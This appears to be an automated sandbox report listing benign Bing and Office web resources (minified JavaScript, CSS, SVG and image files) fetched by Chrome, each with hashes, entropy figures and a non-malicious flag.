                                                                                                    URL:https://r.bing.com/rp/mYtE7wXL7GYF6Ize7zNUy8-aVmw.js
                                                                                                    Preview:var MobileIcon;(function(){function ei(){ri?f=h.Homepage:ui?f=h.Chat:ii?f=h.SERP:fi&&(f=h.ImageCreator)}function oi(){var t,r;rt()?((t=n===null||n===void 0?void 0:n.classList)===null||t===void 0?void 0:t.add("b_hide"),i("overlap")):((r=n===null||n===void 0?void 0:n.classList)===null||r===void 0?void 0:r.remove("b_hide"),Log.Log(e,wt,"resize"))}function rt(){return(nt===null||nt===void 0?void 0:nt.offsetWidth)-((a===null||a===void 0?void 0:a.offsetWidth)+(g===null||g===void 0?void 0:g.offsetWidth)+it)<dt}function r(t){var r=_ge("id_mobpopcntr");(n===null||n===void 0?void 0:n.contains(t===null||t===void 0?void 0:t.target))||(r===null||r===void 0?void 0:r.contains(t===null||t===void 0?void 0:t.target))||i("ClickPage")}function at(n){n.key==="Escape"&&i("EscapeKeydown")}function vt(){hi();n===null||n===void 0?void 0:n.classList.add("active");y=!0;ci();t&&t.focus()}function si(){if(sj_gx){var n=sj_gx(),t=void 0;switch(!0){case ni:t="/header/mobupsellflyvid/?enablevidflyoutl2="+(ti?"1":"0")+
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (715), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):715
                                                                                                    Entropy (8bit):5.032953809282417
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iggpIYa1gjMPRuQR6uqRa+IARLzayARSASBI4AM1mAu0AkgO3AiDMvTAD0xpmDO1:IIbR6uqRTxLzayARSnBP3EH0lgCmvTAo
                                                                                                    MD5:ACA7B62EF304E4E17941914622BF3A91
                                                                                                    SHA1:0D66F41D9084A43DD339DFA584D0C44FC3C438E3
                                                                                                    SHA-256:A4579184B85367432CE944BC8652024345BA631B3E16BCF6330A9BE1C45C1591
                                                                                                    SHA-512:7BF21542A5B092D32ED1BEE229447BAECDB9C2E9BDC4EC7F6CD7101F84CE67039E2142AC6413B9A231A77A427E8959B99EDBD2445C293AF54C0135C7C303C344
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/DWb0HZCEpD3TOd-lhNDET8PEOOM.css
                                                                                                    Preview:#bepfo{background-color:#fff !important;color:#444 !important;z-index:10}#bepfo.b_hide{display:none !important}#bepfo.darkMode{background-color:#11100f !important;color:#edebe9 !important}#bepfo #bepfm{max-width:320px;overflow:hidden;box-sizing:border-box;border-radius:4px}.rwspotlight{padding-right:376px}@media only screen and (max-width:1307px){.rwspotlight{padding-right:0}}.popup{transform:scale(0);transform-origin:center top;animation-name:autoOpenPopup;animation-duration:300ms;animation-delay:200ms;animation-timing-function:linear;animation-fill-mode:forwards}@keyframes autoOpenPopup{0%{transform:scale(0)}30%{transform:scale(.3)}50%{transform:scale(.5)}80%{transform:scale(.8)}100%{transform:scale(1)}}
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (5738), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):5738
                                                                                                    Entropy (8bit):5.114371070471245
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:xYLyztiz5XwxTbVvI2NxsHQH56PkYveiekeBekebVejeIIvAybIgE3UyfI0syxHz:2z5gxTdNxsHQH568YveiekeBeke5ejeY
                                                                                                    MD5:2937C6DCAD55E5E4A67945F4F803C7CD
                                                                                                    SHA1:27399487B23109021F178841013D476F92B057C6
                                                                                                    SHA-256:ACB0819704DDC4062D6A3B565BA7FE999FEF298778B4B56C284E8F1BEBF3C9B7
                                                                                                    SHA-512:2C07163F841A09D2061AF35C7183984475247CE50A9000B4B2B0B5240701A64B140ECA99853238DB08BB94E9B9368BDFFFE9E83185EDA1745FB02E6F81110D3A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/JzmUh7IxCQIfF4hBAT1Hb5KwV8Y.js
                                                                                                    Preview:var Chevrons;(function(n){function s(){f=null;t=null;e=!1;o=!1}function a(n,t,i,r,u,f){var e,o=function(n,t,i,r,f){return new l(n,t,i,r,u,f)};typeof SmartRendering!="undefined"?SmartRendering.LoadElementWhenDisplayed(this,_ge(n),o,[n,t,i,r]):o.apply(this,[n,t,i,r,f]);(e=window.ChevronsPoleWheel||window.ChevronsPoleWheelCF)===null||e===void 0?void 0:e.init({container:_ge(n),btnPrev:t,btnNext:i})}var i="disabled",h="hidden",r="darkchv",u="exp",c="expd",t=null,f=null,e=!1,o=!1,l=function(){function n(n,t,i,r,f,e){var o=this;this.controlId=n;this.prevSlideBtn=t;this.nextSlideBtn=i;this.tabbable=r;this.enableGradientDisappear=f;this.nextChevronOverlay=_ge(e+"_chevron_overlay_next");this.prevChevronOverlay=_ge(e+"_chevron_overlay_prev");this.onPrevClick(function(){var n="slideexp_slideprev",t="Prev",i=Lib.CssClass.contains(o.prevSlideBtn,u);i&&(Lib.CssClass.remove(o.prevSlideBtn,u),Lib.CssClass.add(o.prevSlideBtn,c),n="slideexp_expandleft",t="ExpandLeft");sj_evt.fire(n,o.controlId);Log.Log(t
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1034 x 719, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):449258
                                                                                                    Entropy (8bit):7.987066102559051
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:d2GTMhzF8cPHvuBGMRBflaF7+smn+i0QuCPSSqjv:d2LZHPHWBrlaw5+HBCqNv
                                                                                                    MD5:1858A1BEB780FEAFE4BBAC77F49ED237
                                                                                                    SHA1:51B892F52A9A288E73578ADC6AA2C3E62C59A63B
                                                                                                    SHA-256:C8119EE0CC14A582FB8BE25EE58C7DFA1D5D4DFE51C8665B03268196D2E5F0C7
                                                                                                    SHA-512:5B2463CFCB7F5FAA4967739AF5D844BE569E22C1103BD7A1AC6DE5DEB42F0AC2E653404294DBE8CE65010E8DD1F4B846557AA16B022ACC4773981EDD754C518D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-consumer-2-mreb-1858a1beb7.png
                                                                                                    Preview:.PNG........IHDR..............Q".....pHYs.........&.:4....sRGB.........gAMA......a.....IDATx...{.mIv....}...{.o.g.g.{f8.k.")r(.,F4ir..I.$G.L.!dG.%...r..!.8.$..8.......$H.......0lQ.dI.H.!..y.3.wwOw..;.*.j...s.E....5s.;g..kW..Z.[.Z.JdO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=..M...iO{...D.....=[z......{.~>...il.g...,}.......9.>..)..L./.../\.....A...I..g...=.iO{.....?Vi'.......o...;.<y%..?..rG.x.{..\..\.ww.....;O.]...9...>...w...{........x|..xx.:].s8d....!..,Y.. 9...o.9'..Z..;9.JI.%....'...Z6..j.P........Z......-..Jm..aI.0Ni....._.WW.Z.....R{._/7..{k.Wz.u.P..n..lW)...........]Z.K.7g.w...X..<....I..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):209
                                                                                                    Entropy (8bit):6.257245349235395
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPl3xWrE9/gnbBE1d7snLQNylzkIgDhqo/1ir1216rTmVN80S+st2up:6v/lhPKwCnFGgQNyld+/ou6Hp0NsTp
                                                                                                    MD5:7D4555B1487EC50930C7567B2690BF10
                                                                                                    SHA1:544C4B9A47D0D12FD38FDC07900D32D31C0F600F
                                                                                                    SHA-256:50BBDF35A7DE6804B4E50971D7E3656D6C8100E4A03CF935F841D0AFD47D8371
                                                                                                    SHA-512:F293E1F06C7244C2FD080A65C3A32D134A6AF23E9148B8A391E242D8EA36297FFE8C500903B9B65A6E450EB1731ECF28CBE0A67F6E246938501BEBDDA5A6B177
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=ODLS.480bd363-7238-4d42-b934-f68d1d6f992a&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J....sIDATXG....0...7...#.}$.....N..bu...,.....>>.mm....8....K....@....NW..n......cL..7....0....\...v.k.. ......`x....GT..{....IEND.B`.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):282
                                                                                                    Entropy (8bit):4.768675821769942
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:tbXH4mc4sl3UY7eERI1+N9H5R0MLERIwoVNdJMvdIXyCWfuBIAFfu:tbH41niB1+bj0MLBnpavdqyVGBIAFm
                                                                                                    MD5:E38795B634154EC1FF41C6BCDA54EE52
                                                                                                    SHA1:16C6BF388D00A650A75685C671AF002CEA344B4B
                                                                                                    SHA-256:66B589F920473F0FD69C45C8E3C93A95BB456B219CBA3D52873F2A3A1880F3F0
                                                                                                    SHA-512:DCA2E67C46CFF1B9BE39CE8B0D83C34173E6B77EC08FA4EB4BA18A4555144523C570D785549FED7A9909C2E2C3B48D705B6E332832CA4D5DE424B5F7C3CD59BE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/Fsa_OI0AplCnVoXGca8ALOo0S0s.svg
                                                                                                    Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16">.. <path d="M0 0h16v16h-16z" fill="none"/>.. <path d="M8 1a7 7 0 1 0 7 7 7 7 0 0 0-7-7zm1 10a1 1 0 0 1-2 0v-3a1 1 0 0 1 2 0zm-.293-5.293a1 1 0 1 1 .293-.707 1 1 0 0 1-.293.707z" fill="#767676"/>..</svg>
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (380), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):380
                                                                                                    Entropy (8bit):5.094206183585203
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:2LGXTMkCDpk6CSVKvxpKv8RJf+mTq7fxu7hJRJeGMYS+ePekKfT32PV9m+8mq1mh:2QVlY8/mm4gRUGhS+eTKb2PVESq8qrO
                                                                                                    MD5:65125851782A676455B556D771D3AC70
                                                                                                    SHA1:F201FD1277FC51D53EBB8611CBA3EB2C083BB3CD
                                                                                                    SHA-256:D763F1E7E5DDDE8E9C79BCE466A9F4FFFBD1FE8018E46AE7C75DF5FDC29CF8DB
                                                                                                    SHA-512:A2C9F13BD9BE96D7FADF43FF1B02AC357767B432E63B80394AC86864CE3F8BF306C5CB52489240540DDE87353451EEF2D298F840C585670D603C31694C4ABD29
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:(function(){function r(n){if(n&&(i=0),!(i>60)){i++;var u=_w.CursorProgress||_w.CursorProgressFull;typeof u!="undefined"&&u&&u.bind();t&&sb_ct(t);t=sb_st(r,1e3)}}function n(){r(!0)}var t=null,i=0;n();typeof sj_be!="undefined"&&sj_be(_w,"load",n);typeof sj_evt!="undefined"&&(sj_evt.bind("onP1",n),sj_evt.bind("onP1Lazy",n),sj_evt.bind("ajaxReady",n),sj_evt.bind("ajax.load",n))})()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1119 x 704, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):591728
                                                                                                    Entropy (8bit):7.996032737804013
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:12288:BzVysRpODYLFLYXMaM48blnrCrjueL1oETab46OxEdB7ny2Q7e/:rODoSMcImr71eUXEPnBQq/
                                                                                                    MD5:8977DBD5387860CD8344B51DC4F00216
                                                                                                    SHA1:A0BCA65DE5D325B87EBDED22EC2EE9F459EED2DB
                                                                                                    SHA-256:6EA50E423008D71C95B019385D8A3D018DE4B9735870224B49EBA9B2E2A0263B
                                                                                                    SHA-512:EAEC056E681DFAC5CDEFBA16A1AB20CBDBD736AC77D14F018FD6C371F2D6C1F81ED46353B7661BB2E326A89E608D5B2B9097A0AD0F7ADF4DEF682AE835D75B13
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR..._.........E:......pHYs.........&.:4....sRGB.........gAMA......a.....IDATx...I.mKr&.....9.{.....H.I1.Y.T.RBB@....h....@....j.Y.......5......T....lX.....|.........?3...9.y$.n.W.nnnn..,o.&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L.0a...&L...L..:`....~|s.....UV^IX.)?K).=+.y..w....j.[.e..2..%_...9._IJ...z=.G.Z..`...g...r...[...{....w(..?..1<%r..........w.&...`.~...&L.0a..3..-.................x...X..^...Z.......5.<..'O...+9\.,......9.0....=oN."....b._.{Zy.X.{I.e{.].......!...=.ER.-m.G.y...o...<.V`.?..i-...z.~.5...[.V..0-k*{...2....}J...ij..&%.R...+%.K.wz...r'Fy~....s.ZQ.gMYR}O%C.S)=......GO....\./.Zo...q.x7.dY.......g....w.Y.\x.....R.J..S...\.,.b......S.{J.?..[.M../.s......t....M..\.?P...W.&O8......W.....&u%.....A
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (32000)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):149053
                                                                                                    Entropy (8bit):5.440876470211605
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:ueeUcMiWa1y6FIwee1fw5hXmk9fVyIRiaO0TnNUrt:feUB8UOf0hX/9YaBTnyrt
                                                                                                    MD5:95F2F0FC50065B017596646C65E90D3E
                                                                                                    SHA1:900566D546C121942D1964250FE4D3CEC23ADF3D
                                                                                                    SHA-256:898F9F6B7CF9D9E797BB187001FCEDEB9999F912C9DC1A2CF5ABD30D961CC69D
                                                                                                    SHA-512:9EF614ABB368F3291A22264287F7A7C7A8217CCEF71BA46E624C8B385D49AA8A9B13C7FEEE5338CAB632D3B1493864E7EE46A3D988F2437B5C66CBA65A5F395F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var __awaiter=this&&this.__awaiter||function(e,t,n,i){function r(e){return e instanceof n?e:new n(function(t){t(e)})}return new(n||(n=Promise))(function(n,a){function o(e){try{u(i.next(e))}catch(e){a(e)}}function c(e){try{u(i.throw(e))}catch(e){a(e)}}function u(e){e.done?n(e.value):r(e.value).then(o,c)}u((i=i.apply(e,t||[])).next())})},__generator=this&&this.__generator||function(e,t){function n(e){return function(t){return i([e,t])}}function i(n){if(r)throw new TypeError("Generator is already executing.");for(;c&&(c=0,n[0]&&(u=0)),u;)try{if(r=1,a&&(o=2&n[0]?a.return:n[0]?a.throw||((o=a.return)&&o.call(a),0):a.next)&&!(o=o.call(a,n[1])).done)return o;switch(a=0,o&&(n=[2&n[0],o.value]),n[0]){case 0:case 1:o=n;break;case 4:return u.label++,{value:n[1],done:!1};case 5:u.label++,a=n[1],n=[0];continue;case 7:n=u.ops.pop(),u.trys.pop();continue;default:if(o=u.trys,!(o=o.length>0&&o[o.length-1])&&(6===n[0]||2===n[0])){u=0;continue}if(3===n[0]&&(!o||n[1]>o[0]&&n[1]<o[3])){u.label=n[1];break}if
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):298
                                                                                                    Entropy (8bit):6.792615229750693
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPKwCnFUJwf8RvG0dG9DsCJIWo+aAv+t8FvWwtbp:6v/7iwkFUJMyeHh1IX8S8Fue1
                                                                                                    MD5:0F21D94CE833C0F861617694D028CF0E
                                                                                                    SHA1:EC2639715E2031778BF874660461637EBD7BA368
                                                                                                    SHA-256:D1069BF1EEDFACE550CEC82F5C3954BCA0EA622D0BC792B173F2B1AB3D5EBFD6
                                                                                                    SHA-512:717BCF80BC5F2284EF27F97DED1E2228DCA5E7942B638EDAA7529E18F058D392277B990B182230272F393A349383660BF003E999D2C5DA3DCD8A7589C1D9E8D9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J.....IDATXG..1..0......:...I...`...E."....V...(fiK .Wo.,.o../?.....'O.v>...z..($..@..........[&....NS..C..5.....@.X..fq...r.Q.z"Z7P..Yq...8[...f8Y...\..1.oFWh.......6(..=^.p=.........j.o.....$...@......./X.D.M.....IEND.B`.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (380), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):380
                                                                                                    Entropy (8bit):5.094206183585203
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:2LGXTMkCDpk6CSVKvxpKv8RJf+mTq7fxu7hJRJeGMYS+ePekKfT32PV9m+8mq1mh:2QVlY8/mm4gRUGhS+eTKb2PVESq8qrO
                                                                                                    MD5:65125851782A676455B556D771D3AC70
                                                                                                    SHA1:F201FD1277FC51D53EBB8611CBA3EB2C083BB3CD
                                                                                                    SHA-256:D763F1E7E5DDDE8E9C79BCE466A9F4FFFBD1FE8018E46AE7C75DF5FDC29CF8DB
                                                                                                    SHA-512:A2C9F13BD9BE96D7FADF43FF1B02AC357767B432E63B80394AC86864CE3F8BF306C5CB52489240540DDE87353451EEF2D298F840C585670D603C31694C4ABD29
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/8gH9Enf8UdU-u4YRy6PrLAg7s80.js
                                                                                                    Preview:(function(){function r(n){if(n&&(i=0),!(i>60)){i++;var u=_w.CursorProgress||_w.CursorProgressFull;typeof u!="undefined"&&u&&u.bind();t&&sb_ct(t);t=sb_st(r,1e3)}}function n(){r(!0)}var t=null,i=0;n();typeof sj_be!="undefined"&&sj_be(_w,"load",n);typeof sj_evt!="undefined"&&(sj_evt.bind("onP1",n),sj_evt.bind("onP1Lazy",n),sj_evt.bind("ajaxReady",n),sj_evt.bind("ajax.load",n))})()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):128876
                                                                                                    Entropy (8bit):5.619472552990925
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:KMvtMQbboZ9ZtC58i64oeolxf6DjwrgGUO7Bf7KVAvSsqAd+/vwzntPWKdwCifrE:KMvbboZ9rMadKwrgGvasZ3tPW/E
                                                                                                    MD5:DB56ED28232133AD0E3FFC1253ECAF30
                                                                                                    SHA1:51C2977AEED28BE40B0594809EFD530EEB6D3FB0
                                                                                                    SHA-256:C3900CC7C12E7417F375AD8CA56B9A0BBB389E0126601D4FF5550D5B39175ADB
                                                                                                    SHA-512:E1E4D00E257CF377C3389F1F542AADD5FADE2CCD88CCCB75723CAB6237974FF88CA5303251EE7BE85A59326DE984CDF60DA668A9C533F8CA02EABA2F9838AEAE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var n=t();for(var r in n)("object"==typeof exports?exports:e)[r]=n[r]}}(this,(()=>(()=>{"use strict";var e={7294:(e,t,n)=>{n.d(t,{o:()=>i});const r=JSON.parse('{"versions":{"all":"1.1.2","medallion":"1.1.2","medallion-mobile":"1.1.2"},"env":{"name":"PROD"},"apiServer":{"falconBaseUrl":"https://rewards.bing.com","snrBaseUrl":"https://bing.com"}}');class i{}i.settings=r},477:(e,t,n)=>{var r;n.d(t,{I6:()=>s,Z3:()=>o,bc:()=>a,pQ:()=>r,zL:()=>i}),n(2953),function(e){e.Medallion="medallion",e.MedallionBalance="medallion-balance",e.MedallionMedalCircled="medallion-medal-circled",e.MedallionMedalCircledAnimated="medallion-medal-circled-animated",e.MedallionMedalDailyCheckInProgress="medallion-medal-dailycheckin-progress",e.MedallionMedalDailyCheckInCompleted="medallion-medal-dailycheckin-completed",e.MedallionMedalGoalTracking="medallion-medal-g
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):964
                                                                                                    Entropy (8bit):4.421237058266115
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:t741nTY2jmYXhgauOwgXl3gHuWg9cZLzix9QiVCVCTikxQmQ6Nkpgeoo7:dQnkwXhnuOwIlwHuW7nC9QkaUzQm3Nk5
                                                                                                    MD5:88E3ED3DD7EEE133F73FFB9D36B04B6F
                                                                                                    SHA1:518B54603727D68665146F987C13F3E7DCDE8D82
                                                                                                    SHA-256:A39AB0A67C08D907EDDB18741460399232202C26648D676A22AD06E9C1D874CB
                                                                                                    SHA-512:90FF1284A7FEB9555DFC869644BD5DF8A022AE7873547292D8F6A31BA0808613B6A7F23CB416572ADB298EEE0998E0270B78F41C619D84AB379D0CA9D1D9DA6B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/UYtUYDcn1oZlFG-YfBPz59zejYI.svg
                                                                                                    Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" enable-background="new 0 0 16 16"><g fill="#00809D"><path d="M2.25 0h-1.25c-.263 0-.521.107-.707.293-.186.186-.293.444-.293.707v1.25c0 .552.448 1 1 1s1-.448 1-1v-.25h.25c.552 0 1-.448 1-1s-.448-1-1-1zM1 8.75c.552 0 1-.448 1-1v-1.5c0-.552-.448-1-1-1s-1 .448-1 1v1.5c0 .552.448 1 1 1zM2.25 12h-.25v-.25c0-.552-.448-1-1-1s-1 .448-1 1v1.25c0 .263.107.521.293.707s.444.293.707.293h1.25c.552 0 1-.448 1-1s-.448-1-1-1zM11.75 2h.25v.25c0 .552.448 1 1 1s1-.448 1-1v-1.25c0-.263-.107-.521-.293-.707-.186-.186-.444-.293-.707-.293h-1.25c-.552 0-1 .448-1 1s.448 1 1 1zM6.25 2h1.5c.552 0 1-.448 1-1s-.448-1-1-1h-1.5c-.552 0-1 .448-1 1s.448 1 1 1zM14.5 7h-.5v-.75c0-.552-.448-1-1-1s-1 .448-1 1v.75h-3.5c-.828 0-1.5.671-1.5 1.5v3.5h-.75c-.552 0-1 .448-1 1s.448 1 1 1h.75v.5c0 .828.672 1.5 1.5 1.5h6c.828 0 1.5-.672 1.5-1.5v-6c0-.829-.672-1.5-1.5-1.5z"/></g><path fill="none" d="M0 0h16v16h-16z"/></svg>
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (2515), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2515
                                                                                                    Entropy (8bit):5.419782483013886
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:X4VRGViRGbscCg/965KrMq44NI9ThJRdmXYtEjoBNuFawj1Qy0SIX0l9p:X4V4iiN/sUrMUNSFRmXY6s3uFa+0SII
                                                                                                    MD5:8FF56617CB783BC4A5CE5FE5F2F77901
                                                                                                    SHA1:30D9146F8A5C2DCADAB66C58DC906D71BBFF9D6B
                                                                                                    SHA-256:A1262E758A4CD53ECD8ADA441DF53814386BE938A8CE8C2E81ED5BC806FAFA16
                                                                                                    SHA-512:4F9B499BEE8BDC78A2DF8F95AD6DEC9FB75908BF8682BCA22E66F8A8F7118446C9E11D2705AF922FCCF6F738A1746D16DA15EBB64F6FDBD5485EDB1B7D3E7DEA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var Feedback;(function(n){function s(n,t,e,o,s){var w="thumb_t"+t,b="thumb_f"+t,k="thumb_tum"+t,c=_ge(w),l=_ge(b),v=_ge(k),d="fdbk_emotion"+t,a=_ge(d),g="thumbUpTips"+t,nt=_ge(g),tt="fdbtext_"+t,it=_ge(tt),y,p;c&&sj_be(c,"click",function(){c.classList.add("active");r(!0,a);h(l,it,nt);i(!0,t,n,o,s);c.tabIndex=-1;c.blur();c.removeAttribute("role");c.ariaDisabled="true";v&&v.focus()});l&&(sj_be(l,"click",function(){l.classList.add("active");r(!1,a);i(!1,t,n,o,s)}),sj_be(l,"keydown",function(u){u instanceof KeyboardEvent&&u.keyCode!==13||(l.classList.add("active"),r(!1,a),i(!1,t,n,o,s))}));a&&!f&&(f=!0,y=function(){var n=_d.querySelectorAll(".fdbk_emotion"),t,i,r;if(n&&n.length>0)for(t=0;t<n.length;t++)n[t].childElementCount||(i=document.createElement("img"),i.setAttribute("src","/th?id=OBFB.1B096C6DCB92C2B9A732929A92AF5585&pid=Fb&qlt=99&r=0"),i.classList.add("sat_img"),r=document.createElement("img"),r.setAttribute("src","/th?id=OBFB.1E928B2B86E3D4E8ED1D46B83E667303&pid=Fb&qlt=99&r=0"),r.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1495), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1495
                                                                                                    Entropy (8bit):5.2715271964580745
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:7JVCEan7NLRWm8tRWv6lOnRWtFjDPTDRRKXtwBUSbMh0ZkPBoGBYwIlRW3PwTeJF:ANLwHtwWOnwtNjTDGXt0UqMKZYoGBYfc
                                                                                                    MD5:45345F7E8380393CA0C539AE4CFE32BD
                                                                                                    SHA1:292D5F4B184B3FF7178489C01249F37F5CA395A7
                                                                                                    SHA-256:3A40A1FF034448D68D92A75ABABA09BA5F2B71D130F5F6BDF160DCF8851529A9
                                                                                                    SHA-512:2BFD00BF303AD5A1E8413B5EE6A162167605511FEFB8DF61A8F40F80382F5520DF690A53B1058365F1D81562B2668376886D0F829517A642FCD87412801FE987
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:function addRemoveListenersOnAll(){var t=_ge("b_content"),n,i,r;t&&(n=_d.createElement("STYLE"),n.id=styleIdString,n.innerText="#b_results h2>a {padding: 16px 40px 0 6px;margin: -16px -40px 0 -6px;}",_d.head&&_d.head.appendChild(n),i=t.getElementsByClassName("b_ad"),i&&AddRemoveListener(i),r=t.getElementsByClassName("b_algo"),r&&AddRemoveListener(r))}function AddRemoveListener(n){for(var t,i,u=n.length,r=0;r<u;r++)if(t=n[r].getElementsByTagName("CITE"),t&&t.length>0)for(i=0;i<t.length;i++)sj_be(t[i],"click",algo_c)}function mouseMoveAfterTouchHandler(){sj_ue(document,"mousemove",mouseMoveAfterTouchHandler);var n=_d.getElementById(styleIdString);n&&n.parentNode&&n.parentNode.removeChild(n);sj_log("CI.TTC","mouse","started");sj_ue(document,"mousemove",mouseMoveAfterTouchHandler)}function touchStartHandlerAll(n){n.pointerType==="touch"&&(addRemoveListenersOnAll(),sj_log("CI.TTC","touch","started"),sj_ue(document,"pointerdown",touchStartHandlerAll),document.addEventListener("mousemove",mou
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:53:43], progressive, precision 8, 160x160, components 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4934
                                                                                                    Entropy (8bit):7.782095567670307
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:sHbZoNWsmjRgjXFQvdXNkuz4nicDWk+4Nf6Q2mKwADHfXC7OWn:sFmmjGjWddkuz4nicyktAtmtAbuLn
                                                                                                    MD5:FDA2CEAE0679611937E6E71F701A36AB
                                                                                                    SHA1:75B98D4B8E7142F0F57620296354F61C4C6F3A8F
                                                                                                    SHA-256:B818C1E9B0B46CCCDC158ACA581C3C5F4A9BD3DDA380DA03AF52F43F14F5651E
                                                                                                    SHA-512:904100EBE310AFDF86C2E4C9CBDDC118178D41B45D076BB6077DB8F3BCED8B3CEDF545CE079E39B6F8034C2247FD4C824C0522B6221E3CDC02423AF8EEB9F8A3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
